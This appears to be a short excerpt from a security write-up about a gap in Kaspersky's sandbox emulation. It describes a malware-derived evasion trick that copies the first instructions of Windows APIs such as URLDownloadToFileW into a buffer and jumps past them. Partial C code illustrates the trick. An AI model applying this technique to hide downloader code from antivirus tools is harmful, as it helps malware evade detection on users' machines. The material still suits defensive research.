Kaspersky's sandbox environment has been known to have gaps in what it emulates when examining a process. One such example was found while testing a technique found in known-malware. The technique involved copying the first few assembly instructions of target Windows API functions to an executable buffer, then calling a jmp command after executing the copied instructions which would jmp to the rest of the API code. For example:
DWORD dwOldProtect;
BYTE *urlcode = (BYTE*)VirtualAlloc(NULL, 16, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
HMODULE urlmon = LoadLibrary(L"Urlmon.dll");
BYTE* func = (BYTE*)GetProcAddress(urlmon, "URLDownloadToFileW");
memcpy(urlcode, func, 6); //copy off the first 6 bytes (first few instructions) from the function to our buffer
lpUrlAddr += 6;